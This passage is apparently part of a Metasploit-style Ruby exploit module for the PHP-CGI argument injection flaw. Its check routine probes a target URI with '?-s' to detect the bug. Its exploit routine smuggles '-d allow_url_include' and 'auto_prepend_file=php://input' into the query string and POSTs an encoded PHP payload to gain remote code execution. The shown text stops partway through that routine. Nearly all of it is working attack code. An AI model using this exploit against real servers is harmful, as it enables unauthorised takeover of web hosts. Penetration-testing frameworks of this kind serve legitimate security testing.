register_options([
OptString.new('TARGETURI', [false, "The URI to request"]),
], self.class)
end
# php-cgi -h
# ...
# -s Display colour syntax highlighted source.
def check
uri = target_uri.path
if(uri and ! uri.empty?)
uri.gsub!(/\?.*/, "")
print_status("Checking uri #{uri}")
response = send_request_raw({ 'uri' => uri })
if response and response.code == 200 and response.body =~ /\<code\>\<span style.*\<\;\?/mi
print_error("Server responded in a way that was ambiguous, could not determine whether it was vulnerable")
return Exploit::CheckCode::Unknown
end
response = send_request_raw({ 'uri' => uri + '?-s'})
if response and response.code == 200 and response.body =~ /\<code\>\<span style.*\<\;\?/mi
return Exploit::CheckCode::Vulnerable
end
print_error("Server responded indicating it was not vulnerable")
return Exploit::CheckCode::Safe
else
return Exploit::CheckCode::Unknown
end
end
def exploit
#sleep 100
begin
php_trues = [ "1", "on", "true" ]
php_falses = [ "0", "off", "false" ]
args = [
"-d+allow_url_include%3d#{rand_php_ini_true}",
"-d+auto_prepend_file%3dphp://input",
]
qs = args.join("+")
uri = "#{target_uri}?#{qs}"
p uri
# Has to be all on one line, so gsub out the comments and the newlines
payload_oneline = "<?php " +payload.encoded.gsub(/\s*#.*$/, "").gsub("\n", "")
response = send_request_cgi( {
'method' => "POST",
'global' => true,
'uri' => uri,
'data' => payload_oneline,
}, 0.1)
handler